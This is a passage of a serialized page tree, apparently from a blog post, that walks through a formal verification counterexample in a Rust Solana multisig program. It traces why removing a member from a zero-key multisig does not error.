,{"type":24,"tag":301,"props":33380,"children":33381},{"style":385},[33382],{"type":30,"value":1456},{"type":24,"tag":301,"props":33384,"children":33385},{"style":359},[33386],{"type":30,"value":26216},{"type":24,"tag":301,"props":33388,"children":33389},{"class":303,"line":335},[33390],{"type":24,"tag":301,"props":33391,"children":33392},{"style":359},[33393],{"type":30,"value":27029},{"type":24,"tag":301,"props":33395,"children":33396},{"class":303,"line":344},[33397],{"type":24,"tag":301,"props":33398,"children":33399},{"style":359},[33400],{"type":30,"value":26986},{"type":24,"tag":301,"props":33402,"children":33403},{"class":303,"line":401},[33404,33408,33412,33416,33420,33424,33428,33432,33436,33440,33444],{"type":24,"tag":301,"props":33405,"children":33406},{"style":359},[33407],{"type":30,"value":26994},{"type":24,"tag":301,"props":33409,"children":33410},{"style":385},[33411],{"type":30,"value":206},{"type":24,"tag":301,"props":33413,"children":33414},{"style":359},[33415],{"type":30,"value":21467},{"type":24,"tag":301,"props":33417,"children":33418},{"style":385},[33419],{"type":30,"value":206},{"type":24,"tag":301,"props":33421,"children":33422},{"style":359},[33423],{"type":30,"value":30568},{"type":24,"tag":301,"props":33425,"children":33426},{"style":385},[33427],{"type":30,"value":206},{"type":24,"tag":301,"props":33429,"children":33430},{"style":359},[33431],{"type":30,"value":27752},{"type":24,"tag":301,"props":33433,"children":33434},{"style":385},[33435],{"type":30,"value":206},{"type":24,"tag":301,"props":33437,"children":33438},{"style":359},[33439],{"type":30,"value":27790},{"type":24,"tag":301,"props":33441,"children":33442},{"style":385},[33443],{"type":30,"value":26188},{"type":24,"tag":301,"props":33445,"children":33446},{"style":359},[33447],{"type":30,"value":26216},{"type":24,"tag":301,"props":33449,"children":33450},{"class":303,"line":415},[33451],{"type":24,"tag":301,"props":33452,"children":33453},{"style":359},[33454],{"type":30,"value":27029},{"type":24,"tag":301,"props":33456,"children":33457},{"class":303,"line":439},[33458,33462,33466,33470,33474,33478,33482],{"type":24,"tag":301,"props":33459,"children":33460},{"style":348},[33461],{"type":30,"value":27037},{"type":24,"tag":301,"props":33463,"children":33464},{"style":314},[33465],{"type":30,"value":32521},{"type":24,"tag":301,"props":33467,"children":33468},{"style":359},[33469],{"type":30,"value":362},{"type":24,"tag":301,"props":33471,"children":33472},{"style":385},[33473],{"type":30,"value":4054},{"type":24,"tag":301,"props":33475,"children":33476},{"style":359},[33477],{"type":30,"value":30745},{"type":24,"tag":301,"props":33479,"children":33480},{"style":385},[33481],{"type":30,"value":4054},{"type":24,"tag":301,"props":33483,"children":33484},{"style":359},[33485],{"type":30,"value":16401},{"type":24,"tag":32,"props":33487,"children":33488},{},[33489,33491,33496],{"type":30,"value":33490},"Let's test this, we just need to run the new ",{"type":24,"tag":145,"props":33492,"children":33494},{"className":33493},[],[33495],{"type":30,"value":26932},{"type":30,"value":289},{"type":24,"tag":291,"props":33498,"children":33500},{"code":33499},"VERIFICATION:- FAILED\nVerification Time: 31.900913s\n",[33501],{"type":24,"tag":145,"props":33502,"children":33503},{"__ignoreMap":7},[33504],{"type":30,"value":33499},{"type":24,"tag":32,"props":33506,"children":33507},{},[33508],{"type":30,"value":33509},"Hmm, this verification failed! Let's look at the counterexample. The multisig it is trying to remove a member from looks like:",{"type":24,"tag":291,"props":33511,"children":33513},{"code":33512,"language":9817,"meta":7,"className":9818,"style":7},"Account {\n account: Ms {\n threshold: 0,\n authority_index: 0,\n transaction_index: 0,\n ms_change_index: 0,\n bump: 0,\n create_key: ...,\n allow_external_execute: false,\n keys: Vec {\n data: ...,\n size: 0,\n },\n },\n info: AccountInfo { ... },\n}\n",[33514],{"type":24,"tag":145,"props":33515,"children":33516},{"__ignoreMap":7},[33517,33528,33547,33566,33585,33604,33623,33642,33661,33680,33699,33719,33738,33745,33752,33779],{"type":24,"tag":301,"props":33518,"children":33519},{"class":303,"line":304},[33520,33524],{"type":24,"tag":301,"props":33521,"children":33522},{"style":10246},[33523],{"type":30,"value":23926},{"type":24,"tag":301,"props":33525,"children":33526},{"style":359},[33527],{"type":30,"value":3035},{"type":24,"tag":301,"props":33529,"children":33530},{"class":303,"line":320},[33531,33535,33539,33543],{"type":24,"tag":301,"props":33532,"children":33533},{"style":369},[33534],{"type":30,"value":31927},{"type":24,"tag":301,"props":33536,"children":33537},{"style":385},[33538],{"type":30,"value":1679},{"type":24,"tag":301,"props":33540,"children":33541},{"style":10246},[33542],{"type":30,"value":27925},{"type":24,"tag":301,"props":33544,"children":33545},{"style":359},[33546],{"type":30,"value":3035},{"type":24,"tag":301,"props":33548,"children":33549},{"class":303,"line":335},[33550,33554,33558,33562],{"type":24,"tag":301,"props":33551,"children":33552},{"style":369},[33553],{"type":30,"value":30588},{"type":24,"tag":301,"props":33555,"children":33556},{"style":385},[33557],{"type":30,"value":1679},{"type":24,"tag":301,"props":33559,"children":33560},{"style":466},[33561],{"type":30,"value":685},{"type":24,"tag":301,"props":33563,"children":33564},{"style":359},[33565],{"type":30,"value":1729},{"type":24,"tag":301,"props":33567,"children":33568},{"class":303,"line":344},[33569,33573,33577,33581],{"type":24,"tag":301,"props":33570,"children":33571},{"style":369},[33572],{"type":30,"value":31967},{"type":24,"tag":301,"props":33574,"children":33575},{"style":385},[33576],{"type":30,"value":1679},{"type":24,"tag":301,"props":33578,"children":33579},{"style":466},[33580],{"type":30,"value":685},{"type":24,"tag":301,"props":33582,"children":33583},{"style":359},[33584],{"type":30,"value":1729},{"type":24,"tag":301,"props":33586,"children":33587},{"class":303,"line":401},[33588,33592,33596,33600],{"type":24,"tag":301,"props":33589,"children":33590},{"style":369},[33591],{"type":30,"value":31987},{"type":24,"tag":301,"props":33593,"children":33594},{"style":385},[33595],{"type":30,"value":1679},{"type":24,"tag":301,"props":33597,"children":33598},{"style":466},[33599],{"type":30,"value":685},{"type":24,"tag":301,"props":33601,"children":33602},{"style":359},[33603],{"type":30,"value":1729},{"type":24,"tag":301,"props":33605,"children":33606},{"class":303,"line":415},[33607,33611,33615,33619],{"type":24,"tag":301,"props":33608,"children":33609},{"style":369},[33610],{"type":30,"value":32007},{"type":24,"tag":301,"props":33612,"children":33613},{"style":385},[33614],{"type":30,"value":1679},{"type":24,"tag":301,"props":33616,"children":33617},{"style":466},[33618],{"type":30,"value":685},{"type":24,"tag":301,"props":33620,"children":33621},{"style":359},[33622],{"type":30,"value":1729},{"type":24,"tag":301,"props":33624,"children":33625},{"class":303,"line":439},[33626,33630,33634,33638],{"type":24,"tag":301,"props":33627,"children":33628},{"style":369},[33629],{"type":30,"value":32027},{"type":24,"tag":301,"props":33631,"children":33632},{"style":385},[33633],{"type":30,"value":1679},{"type":24,"tag":301,"props":33635,"children":33636},{"style":466},[33637],{"type":30,"value":685},{"type":24,"tag":301,"props":33639,"children":33640},{"style":359},[33641],{"type":30,"value":1729},{"type":24,"tag":301,"props":33643,"children":33644},{"class":303,"line":447},[33645,33649,33653,33657],{"type":24,"tag":301,"props":33646,"children":33647},{"style":369},[33648],{"type":30,"value":30600},{"type":24,"tag":301,"props":33650,"children":33651},{"style":385},[33652],{"type":30,"value":1679},{"type":24,"tag":301,"props":33654,"children":33655},{"style":385},[33656],{"type":30,"value":32055},{"type":24,"tag":301,"props":33658,"children":33659},{"style":359},[33660],{"type":30,"value":1729},{"type":24,"tag":301,"props":33662,"children":33663},{"class":303,"line":476},[33664,33668,33672,33676],{"type":24,"tag":301,"props":33665,"children":33666},{"style":369},[33667],{"type":30,"value":32067},{"type":24,"tag":301,"props":33669,"children":33670},{"style":385},[33671],{"type":30,"value":1679},{"type":24,"tag":301,"props":33673,"children":33674},{"style":348},[33675],{"type":30,"value":3613},{"type":24,"tag":301,"props":33677,"children":33678},{"style":359},[33679],{"type":30,"value":1729},{"type":24,"tag":301,"props":33681,"children":33682},{"class":303,"line":495},[33683,33687,33691,33695],{"type":24,"tag":301,"props":33684,"children":33685},{"style":369},[33686],{"type":30,"value":32087},{"type":24,"tag":301,"props":33688,"children":33689},{"style":385},[33690],{"type":30,"value":1679},{"type":24,"tag":301,"props":33692,"children":33693},{"style":10246},[33694],{"type":30,"value":28158},{"type":24,"tag":301,"props":33696,"children":33697},{"style":359},[33698],{"type":30,"value":3035},{"type":24,"tag":301,"props":33700,"children":33701},{"class":303,"line":504},[33702,33707,33711,33715],{"type":24,"tag":301,"props":33703,"children":33704},{"style":369},[33705],{"type":30,"value":33706}," data",{"type":24,"tag":301,"props":33708,"children":33709},{"style":385},[33710],{"type":30,"value":1679},{"type":24,"tag":301,"props":33712,"children":33713},{"style":385},[33714],{"type":30,"value":32055},{"type":24,"tag":301,"props":33716,"children":33717},{"style":359},[33718],{"type":30,"value":1729},{"type":24,"tag":301,"props":33720,"children":33721},{"class":303,"line":512},[33722,33726,33730,33734],{"type":24,"tag":301,"props":33723,"children":33724},{"style":369},[33725],{"type":30,"value":32108},{"type":24,"tag":301,"props":33727,"children":33728},{"style":385},[33729],{"type":30,"value":1679},{"type":24,"tag":301,"props":33731,"children":33732},{"style":466},[33733],{"type":30,"value":685},{"type":24,"tag":301,"props":33735,"children":33736},{"style":359},[33737],{"type":30,"value":1729},{"type":24,"tag":301,"props":33739,"children":33740},{"class":303,"line":592},[33741],{"type":24,"tag":301,"props":33742,"children":33743},{"style":359},[33744],{"type":30,"value":32129},{"type":24,"tag":301,"props":33746,"children":33747},{"class":303,"line":619},[33748],{"type":24,"tag":301,"props":33749,"children":33750},{"style":359},[33751],{"type":30,"value":32137},{"type":24,"tag":301,"props":33753,"children":33754},{"class":303,"line":635},[33755,33759,33763,33767,33771,33775],{"type":24,"tag":301,"props":33756,"children":33757},{"style":369},[33758],{"type":30,"value":32145},{"type":24,"tag":301,"props":33760,"children":33761},{"style":385},[33762],{"type":30,"value":1679},{"type":24,"tag":301,"props":33764,"children":33765},{"style":10246},[33766],{"type":30,"value":32154},{"type":24,"tag":301,"props":33768,"children":33769},{"style":359},[33770],{"type":30,"value":16392},{"type":24,"tag":301,"props":33772,"children":33773},{"style":385},[33774],{"type":30,"value":4054},{"type":24,"tag":301,"props":33776,"children":33777},{"style":359},[33778],{"type":30,"value":32167},{"type":24,"tag":301,"props":33780,"children":33781},{"class":303,"line":643},[33782],{"type":24,"tag":301,"props":33783,"children":33784},{"style":359},[33785],{"type":30,"value":698},{"type":24,"tag":32,"props":33787,"children":33788},{},[33789],{"type":30,"value":33790},"Interestingly, the multisig has 0 keys and yet this instruction does not error. Let's take a closer look to figure out why:",{"type":24,"tag":32,"props":33792,"children":33793},{},[33794,33796,33802],{"type":30,"value":33795},"Inside our handler, we see that it only checks if the number of keys exactly equals 1. Otherwise it invokes ",{"type":24,"tag":145,"props":33797,"children":33799},{"className":33798},[],[33800],{"type":30,"value":33801},"Ms::remove_member",{"type":30,"value":1679},{"type":24,"tag":291,"props":33804,"children":33806},{"code":33805,"language":9817,"meta":7,"className":9818,"style":7},"if ctx.accounts.multisig.keys.len() == 1 {\n return err!(MsError::CannotRemoveSoloMember);\n}\nctx.accounts.multisig.remove_member(old_member)?;\n",[33807],{"type":24,"tag":145,"props":33808,"children":33809},{"__ignoreMap":7},[33810,33869,33900,33907],{"type":24,"tag":301,"props":33811,"children":33812},{"class":303,"line":304},[33813,33817,33821,33825,33829,33833,33837,33841,33845,33849,33853,33857,33861,33865],{"type":24,"tag":301,"props":33814,"children":33815},{"style":308},[33816],{"type":30,"value":22368},{"type":24,"tag":301,"props":33818,"children":33819},{"style":369},[33820],{"type":30,"value":32599},{"type":24,"tag":301,"props":33822,"children":33823},{"style":385},[33824],{"type":30,"value":206},{"type":24,"tag":301,"props":33826,"children":33827},{"style":359},[33828],{"type":30,"value":21467},{"type":24,"tag":301,"props":33830,"children":33831},{"style":385},[33832],{"type":30,"value":206},{"type":24,"tag":301,"props":33834,"children":33835},{"style":359},[33836],{"type":30,"value":30568},{"type":24,"tag":301,"props":33838,"children":33839},{"style":385},[33840],{"type":30,"value":206},{"type":24,"tag":301,"props":33842,"children":33843},{"style":359},[33844],{"type":30,"value":27752},{"type":24,"tag":301,"props":33846,"children":33847},{"style":385},[33848],{"type":30,"value":206},{"type":24,"tag":301,"props":33850,"children":33851},{"style":314},[33852],{"type":30,"value":6156},{"type":24,"tag":301,"props":33854,"children":33855},{"style":359},[33856],{"type":30,"value":20835},{"type":24,"tag":301,"props":33858,"children":33859},{"style":385},[33860],{"type":30,"value":607},{"type":24,"tag":301,"props":33862,"children":33863},{"style":466},[33864],{"type":30,"value":487},{"type":24,"tag":301,"props":33866,"children":33867},{"style":359},[33868],{"type":30,"value":3035},{"type":24,"tag":301,"props":33870,"children":33871},{"class":303,"line":320},[33872,33876,33880,33884,33888,33892,33896],{"type":24,"tag":301,"props":33873,"children":33874},{"style":308},[33875],{"type":30,"value":680},{"type":24,"tag":301,"props":33877,"children":33878},{"style":314},[33879],{"type":30,"value":30285},{"type":24,"tag":301,"props":33881,"children":33882},{"style":359},[33883],{"type":30,"value":362},{"type":24,"tag":301,"props":33885,"children":33886},{"style":10246},[33887],{"type":30,"value":30294},{"type":24,"tag":301,"props":33889,"children":33890},{"style":385},[33891],{"type":30,"value":10308},{"type":24,"tag":301,"props":33893,"children":33894},{"style":10246},[33895],{"type":30,"value":32675},{"type":24,"tag":301,"props":33897,"children":33898},{"style":359},[33899],{"type":30,"value":589},{"type":24,"tag":301,"props":33901,"children":33902},{"class":303,"line":335},[33903],{"type":24,"tag":301,"props":33904,"children":33905},{"style":359},[33906],{"type":30,"value":698},{"type":24,"tag":301,"props":33908,"children":33909},{"class":303,"line":344},[33910,33914,33918,33922,33926,33930,33934,33938,33942,33946,33950,33954],{"type":24,"tag":301,"props":33911,"children":33912},{"style":369},[33913],{"type":30,"value":27051},{"type":24,"tag":301,"props":33915,"children":33916},{"style":385},[33917],{"type":30,"value":206},{"type":24,"tag":301,"props":33919,"children":33920},{"style":359},[33921],{"type":30,"value":21467},{"type":24,"tag":301,"props":33923,"children":33924},{"style":385},[33925],{"type":30,"value":206},{"type":24,"tag":301,"props":33927,"children":33928},{"style":359},[33929],{"type":30,"value":30568},{"type":24,"tag":301,"props":33931,"children":33932},{"style":385},[33933],{"type":30,"value":206},{"type":24,"tag":301,"props":33935,"children":33936},{"style":314},[33937],{"type":30,"value":32222},{"type":24,"tag":301,"props":33939,"children":33940},{"style":359},[33941],{"type":30,"value":362},{"type":24,"tag":301,"props":33943,"children":33944},{"style":369},[33945],{"type":30,"value":32555},{"type":24,"tag":301,"props":33947,"children":33948},{"style":359},[33949],{"type":30,"value":9961},{"type":24,"tag":301,"props":33951,"children":33952},{"style":385},[33953],{"type":30,"value":2003},{"type":24,"tag":301,"props":33955,"children":33956},{"style":359},[33957],{"type":30,"value":492},{"type":24,"tag":32,"props":33959,"children":33960},{},[33961,33963,33969,33971,33977],{"type":30,"value":33962},"In that function, it checks if the member to remove is contained in that multisig (with ",{"type":24,"tag":145,"props":33964,"children":33966},{"className":33965},[],[33967],{"type":30,"value":33968},"Ms::is_member",{"type":30,"value":33970},") and if it is not, it simply skips the removal and returns ",{"type":24,"tag":145,"props":33972,"children":33974},{"className":33973},[],[33975],{"type":30,"value":33976},"Ok(())",{"type":30,"value":206},{"type":24,"tag":291,"props":33979,"children":33981},{"code":33980,"language":9817,"meta":7,"className":9818,"style":7},"pub fn remove_member(&mut self, member: Pubkey) -> Result\u003C()> {\n if let Some(ind) = self.is_member(member) {\n self.keys.remove(ind);\n if self.keys.len() \u003C usize::from(self.threshold) {\n self.threshold = self.keys.len().try_into().unwrap();\n }\n }\n Ok(())\n}\n",[33982],{"type":24,"tag":145,"props":33983,"children":33984},{"__ignoreMap":7},[33985,34049,34108,34145,34204,34272,34279,34286,34297],{"type":24,"tag":301,"props":33986,"children":33987},{"class":303,"line":304},[33988,33992,33996,34000,34004,34008,34012,34016,34020,34025,34029,34033,34037,34041,34045],{"type":24,"tag":301,"props":33989,"children":33990},{"style":348},[33991],{"type":30,"value":20484},{"type":24,"tag":301,"props":33993,"children":33994},{"style":348},[33995],{"type":30,"value":20489},{"type":24,"tag":301,"props":33997,"children":33998},{"style":314},[33999],{"type":30,"value":32521},{"type":24,"tag":301,"props":34001,"children":34002},{"style":359},[34003],{"type":30,"value":362},{"type":24,"tag":301,"props":34005,"children":34006},{"style":385},[34007],{"type":30,"value":556},{"type":24,"tag":301,"props":34009,"children":34010},{"style":348},[34011],{"type":30,"value":10550},{"type":24,"tag":301,"props":34013,"children":34014},{"style":348},[34015],{"type":30,"value":20590},{"type":24,"tag":301,"props":34017,"children":34018},{"style":359},[34019],{"type":30,"value":377},{"type":24,"tag":301,"props":34021,"children":34022},{"style":369},[34023],{"type":30,"value":34024},"member",{"type":24,"tag":301,"props":34026,"children":34027},{"style":385},[34028],{"type":30,"value":1679},{"type":24,"tag":301,"props":34030,"children":34031},{"style":10246},[34032],{"type":30,"value":27626},{"type":24,"tag":301,"props":34034,"children":34035},{"style":359},[34036],{"type":30,"value":911},{"type":24,"tag":301,"props":34038,"children":34039},{"style":385},[34040],{"type":30,"value":882},{"type":24,"tag":301,"props":34042,"children":34043},{"style":10246},[34044],{"type":30,"value":20555},{"type":24,"tag":301,"props":34046,"children":34047},{"style":359},[34048],{"type":30,"value":27102},{"type":24,"tag":301,"props":34050,"children":34051},{"class":303,"line":320},[34052,34056,34061,34066,34070,34075,34079,34083,34087,34091,34096,34100,34104],{"type":24,"tag":301,"props":34053,"children":34054},{"style":308},[34055],{"type":30,"value":453},{"type":24,"tag":301,"props":34057,"children":34058},{"style":348},[34059],{"type":30,"value":34060}," let",{"type":24,"tag":301,"props":34062,"children":34063},{"style":10246},[34064],{"type":30,"value":34065}," Some",{"type":24,"tag":301,"props":34067,"children":34068},{"style":359},[34069],{"type":30,"value":362},{"type":24,"tag":301,"props":34071,"children":34072},{"style":369},[34073],{"type":30,"value":34074},"ind",{"type":24,"tag":301,"props":34076,"children":34077},{"style":359},[34078],{"type":30,"value":911},{"type":24,"tag":301,"props":34080,"children":34081},{"style":385},[34082],{"type":30,"value":523},{"type":24,"tag":301,"props":34084,"children":34085},{"style":348},[34086],{"type":30,"value":20590},{"type":24,"tag":301,"props":34088,"children":34089},{"style":385},[34090],{"type":30,"value":206},{"type":24,"tag":301,"props":34092,"children":34093},{"style":314},[34094],{"type":30,"value":34095},"is_member",{"type":24,"tag":301,"props":34097,"children":34098},{"style":359},[34099],{"type":30,"value":362},{"type":24,"tag":301,"props":34101,"children":34102},{"style":369},[34103],{"type":30,"value":34024},{"type":24,"tag":301,"props":34105,"children":34106},{"style":359},[34107],{"type":30,"value":398},{"type":24,"tag":301,"props":34109,"children":34110},{"class":303,"line":335},[34111,34116,34120,34124,34128,34133,34137,34141],{"type":24,"tag":301,"props":34112,"children":34113},{"style":348},[34114],{"type":30,"value":34115}," self",{"type":24,"tag":301,"props":34117,"children":34118},{"style":385},[34119],{"type":30,"value":206},{"type":24,"tag":301,"props":34121,"children":34122},{"style":359},[34123],{"type":30,"value":27752},{"type":24,"tag":301,"props":34125,"children":34126},{"style":385},[34127],{"type":30,"value":206},{"type":24,"tag":301,"props":34129,"children":34130},{"style":314},[34131],{"type":30,"value":34132},"remove",{"type":24,"tag":301,"props":34134,"children":34135},{"style":359},[34136],{"type":30,"value":362},{"type":24,"tag":301,"props":34138,"children":34139},{"style":369},[34140],{"type":30,"value":34074},{"type":24,"tag":301,"props":34142,"children":34143},{"style":359},[34144],{"type":30,"value":589},{"type":24,"tag":301,"props":34146,"children":34147},{"class":303,"line":344},[34148,34152,34156,34160,34164,34168,34172,34176,34180,34184,34188,34192,34196,34200],{"type":24,"tag":301,"props":34149,"children":34150},{"style":308},[34151],{"type":30,"value":3285},{"type":24,"tag":301,"props":34153,"children":34154},{"style":348},[34155],{"type":30,"value":20590},{"type":24,"tag":301,"props":34157,"children":34158},{"style":385},[34159],{"type":30,"value":206},{"type":24,"tag":301,"props":34161,"children":34162},{"style":359},[34163],{"type":30,"value":27752},{"type":24,"tag":301,"props":34165,"children":34166},{"style":385},[34167],{"type":30,"value":206},{"type":24,"tag":301,"props":34169,"children":34170},{"style":314},[34171],{"type":30,"value":6156},{"type":24,"tag":301,"props":34173,"children":34174},{"style":359},[34175],{"type":30,"value":32800},{"type":24,"tag":301,"props":34177,"children":34178},{"style":10246},[34179],{"type":30,"value":23383},{"type":24,"tag":301,"props":34181,"children":34182},{"style":385},[34183],{"type":30,"value":10308},{"type":24,"tag":301,"props":34185,"children":34186},{"style":314},[34187],{"type":30,"value":26245},{"type":24,"tag":301,"props":34189,"children":34190},{"style":359},[34191],{"type":30,"value":362},{"type":24,"tag":301,"props":34193,"children":34194},{"style":348},[34195],{"type":30,"value":20507},{"type":24,"tag":301,"props":34197,"children":34198},{"style":385},[34199],{"type":30,"value":206},{"type":24,"tag":301,"props":34201,"children":34202},{"style":359},[34203],{"type":30,"value":32845},{"type":24,"tag":301,"props":34205,"children":34206},{"class":303,"line":401},[34207,34212,34216,34220,34224,34228,34232,34236,34240,34244,34248,34252,34256,34260,34264,34268],{"type":24,"tag":301,"props":34208,"children":34209},{"style":348},[34210],{"type":30,"value":34211}," self",{"type":24,"tag":301,"props":34213,"children":34214},{"style":385},[34215],{"type":30,"value":206},{"type":24,"tag":301,"props":34217,"children":34218},{"style":359},[34219],{"type":30,"value":27840},{"type":24,"tag":301,"props":34221,"children":34222},{"style":385},[34223],{"type":30,"value":523},{"type":24,"tag":301,"props":34225,"children":34226},{"style":348},[34227],{"type":30,"value":20590},{"type":24,"tag":301,"props":34229,"children":34230},{"style":385},[34231],{"type":30,"value":206},{"type":24,"tag":301,"props":34233,"children":34234},{"style":359},[34235],{"type":30,"value":27752},{"type":24,"tag":301,"props":34237,"children":34238},{"style":385},[34239],{"type":30,"value":206},{"type":24,"tag":301,"props":34241,"children":34242},{"style":314},[34243],{"type":30,"value":6156},{"type":24,"tag":301,"props":34245,"children":34246},{"style":359},[34247],{"type":30,"value":20672},{"type":24,"tag":301,"props":34249,"children":34250},{"style":385},[34251],{"type":30,"value":206},{"type":24,"tag":301,"props":34253,"children":34254},{"style":314},[34255],{"type":30,"value":32918},{"type":24,"tag":301,"props":34257,"children":34258},{"style":359},[34259],{"type":30,"value":20672},{"type":24,"tag":301,"props":34261,"children":34262},{"style":385},[34263],{"type":30,"value":206},{"type":24,"tag":301,"props":34265,"children":34266},{"style":314},[34267],{"type":30,"value":10492},{"type":24,"tag":301,"props":34269,"children":34270},{"style":359},[34271],{"type":30,"value":4859},{"type":24,"tag":301,"props":34273,"children":34274},{"class":303,"line":415},[34275],{"type":24,"tag":301,"props":34276,"children":34277},{"style":359},[34278],{"type":30,"value":3345},{"type":24,"tag":301,"props":34280,"children":34281},{"class":303,"line":439},[34282],{"type":24,"tag":301,"props":34283,"children":34284},{"style":359},[34285],{"type":30,"value":501},{"type":24,"tag":301,"props":34287,"children":34288},{"class":303,"line":447},[34289,34293],{"type":24,"tag":301,"props":34290,"children":34291},{"style":10246},[34292],{"type":30,"value":21125},{"type":24,"tag":301,"props":34294,"children":34295},{"style":359},[34296],{"type":30,"value":21130},{"type":24,"tag":301,"props":34298,"children":34299},{"class":303,"line":476},[34300],{"type":24,"tag":301,"props":34301,"children":34302},{"style":359},[34303],{"type":30,"value":698},{"type":24,"tag":32,"props":34305,"children":34306},{},[34307,34309,34314,34316,34322,34324,34330,34332,34337],{"type":30,"value":34308},"Inside ",{"type":24,"tag":145,"props":34310,"children":34312},{"className":34311},[],[34313],{"type":30,"value":33968},{"type":30,"value":34315},", we see that it performs a ",{"type":24,"tag":145,"props":34317,"children":34319},{"className":34318},[],[34320],{"type":30,"value":34321},"binary_search",{"type":30,"value":34323}," on the keys vec and returns the index or ",{"type":24,"tag":145,"props":34325,"children":34327},{"className":34326},[],[34328],{"type":30,"value":34329},"None",{"type":30,"value":34331},". Since the vec has size zero, this will just return ",{"type":24,"tag":145,"props":34333,"children":34335},{"className":34334},[],[34336],{"type":30,"value":34329},{"type":30,"value":206},{"type":24,"tag":291,"props":34339,"children":34341},{"code":34340,"language":9817,"meta":7,"className":9818,"style":7},"pub fn is_member(&self, member: Pubkey) -> Option\u003Cusize> {\n match self.keys.binary_search(&member) {\n Ok(ind) => Some(ind),\n _ => None,\n }\n}\n",[34342],{"type":24,"tag":145,"props":34343,"children":34344},{"__ignoreMap":7},[34345,34414,34457,34496,34518,34525],{"type":24,"tag":301,"props":34346,"children":34347},{"class":303,"line":304},[34348,34352,34356,34361,34365,34369,34373,34377,34381,34385,34389,34393,34397,34402,34406,34410],{"type":24,"tag":301,"props":34349,"children":34350},{"style":348},[34351],{"type":30,"value":20484},{"type":24,"tag":301,"props":34353,"children":34354},{"style":348},[34355],{"type":30,"value":20489},{"type":24,"tag":301,"props":34357,"children":34358},{"style":314},[34359],{"type":30,"value":34360}," is_member",{"type":24,"tag":301,"props":34362,"children":34363},{"style":359},[34364],{"type":30,"value":362},{"type":24,"tag":301,"props":34366,"children":34367},{"style":385},[34368],{"type":30,"value":556},{"type":24,"tag":301,"props":34370,"children":34371},{"style":348},[34372],{"type":30,"value":20507},{"type":24,"tag":301,"props":34374,"children":34375},{"style":359},[34376],{"type":30,"value":377},{"type":24,"tag":301,"props":34378,"children":34379},{"style":369},[34380],{"type":30,"value":34024},{"type":24,"tag":301,"props":34382,"children":34383},{"style":385},[34384],{"type":30,"value":1679},{"type":24,"tag":301,"props":34386,"children":34387},{"style":10246},[34388],{"type":30,"value":27626},{"type":24,"tag":301,"props":34390,"children":34391},{"style":359},[34392],{"type":30,"value":911},{"type":24,"tag":301,"props":34394,"children":34395},{"style":385},[34396],{"type":30,"value":882},{"type":24,"tag":301,"props":34398,"children":34399},{"style":10246},[34400],{"type":30,"value":34401}," Option",{"type":24,"tag":301,"props":34403,"children":34404},{"style":359},[34405],{"type":30,"value":1849},{"type":24,"tag":301,"props":34407,"children":34408},{"style":10246},[34409],{"type":30,"value":23383},{"type":24,"tag":301,"props":34411,"children":34412},{"style":359},[34413],{"type":30,"value":14097},{"type":24,"tag":301,"props":34415,"children":34416},{"class":303,"line":320},[34417,34421,34425,34429,34433,34437,34441,34445,34449,34453],{"type":24,"tag":301,"props":34418,"children":34419},{"style":308},[34420],{"type":30,"value":21545},{"type":24,"tag":301,"props":34422,"children":34423},{"style":348},[34424],{"type":30,"value":20590},{"type":24,"tag":301,"props":34426,"children":34427},{"style":385},[34428],{"type":30,"value":206},{"type":24,"tag":301,"props":34430,"children":34431},{"style":359},[34432],{"type":30,"value":27752},{"type":24,"tag":301,"props":34434,"children":34435},{"style":385},[34436],{"type":30,"value":206},{"type":24,"tag":301,"props":34438,"children":34439},{"style":314},[34440],{"type":30,"value":34321},{"type":24,"tag":301,"props":34442,"children":34443},{"style":359},[34444],{"type":30,"value":362},{"type":24,"tag":301,"props":34446,"children":34447},{"style":385},[34448],{"type":30,"value":556},{"type":24,"tag":301,"props":34450,"children":34451},{"style":369},[34452],{"type":30,"value":34024},{"type":24,"tag":301,"props":34454,"children":34455},{"style":359},[34456],{"type":30,"value":398},{"type":24,"tag":301,"props":34458,"children":34459},{"class":303,"line":335},[34460,34464,34468,34472,34476,34480,34484,34488,34492],{"type":24,"tag":301,"props":34461,"children":34462},{"style":10246},[34463],{"type":30,"value":21603},{"type":24,"tag":301,"props":34465,"children":34466},{"style":359},[34467],{"type":30,"value":362},{"type":24,"tag":301,"props":34469,"children":34470},{"style":369},[34471],{"type":30,"value":34074},{"type":24,"tag":301,"props":34473,"children":34474},{"style":359},[34475],{"type":30,"value":911},{"type":24,"tag":301,"props":34477,"children":34478},{"style":385},[34479],{"type":30,"value":4841},{"type":24,"tag":301,"props":34481,"children":34482},{"style":10246},[34483],{"type":30,"value":34065},{"type":24,"tag":301,"props":34485,"children":34486},{"style":359},[34487],{"type":30,"value":362},{"type":24,"tag":301,"props":34489,"children":34490},{"style":369},[34491],{"type":30,"value":34074},{"type":24,"tag":301,"props":34493,"children":34494},{"style":359},[34495],{"type":30,"value":4656},{"type":24,"tag":301,"props":34497,"children":34498},{"class":303,"line":344},[34499,34504,34509,34514],{"type":24,"tag":301,"props":34500,"children":34501},{"style":369},[34502],{"type":30,"value":34503}," _",{"type":24,"tag":301,"props":34505,"children":34506},{"style":385},[34507],{"type":30,"value":34508}," =>",{"type":24,"tag":301,"props":34510,"children":34511},{"style":10246},[34512],{"type":30,"value":34513}," None",{"type":24,"tag":301,"props":34515,"children":34516},{"style":359},[34517],{"type":30,"value":1729},{"type":24,"tag":301,"props":34519,"children":34520},{"class":303,"line":401},[34521],{"type":24,"tag":301,"props":34522,"children":34523},{"style":359},[34524],{"type":30,"value":501},{"type":24,"tag":301,"props":34526,"children":34527},{"class":303,"line":415},[34528],{"type":24,"tag":301,"props":34529,"children":34530},{"style":359},[34531],{"type":30,"value":698},{"type":24,"tag":32,"props":34533,"children":34534},{},[34535,34537,34542,34544,34549,34551,34556,34558,34563],{"type":30,"value":34536},"So interestingly, a ",{"type":24,"tag":145,"props":34538,"children":34540},{"className":34539},[],[34541],{"type":30,"value":27752},{"type":30,"value":34543}," vec of size 0 ",{"type":24,"tag":5422,"props":34545,"children":34546},{},[34547],{"type":30,"value":34548},"is actually",{"type":30,"value":34550}," a sufficient condition to execute ",{"type":24,"tag":145,"props":34552,"children":34554},{"className":34553},[],[34555],{"type":30,"value":32222},{"type":30,"value":34557},". However would it ever actually happen? Well we know from before that when we create the multisig, the threshold must be less than or equal to the number of keys and also greater than zero. So in any ",{"type":24,"tag":5422,"props":34559,"children":34560},{},[34561],{"type":30,"value":34562},"valid",{"type":30,"value":34564}," multisig, the number of keys should never be zero.",{"type":24,"tag":32,"props":34566,"children":34567},{},[34568,34570,34575],{"type":30,"value":34569},"We can represent this 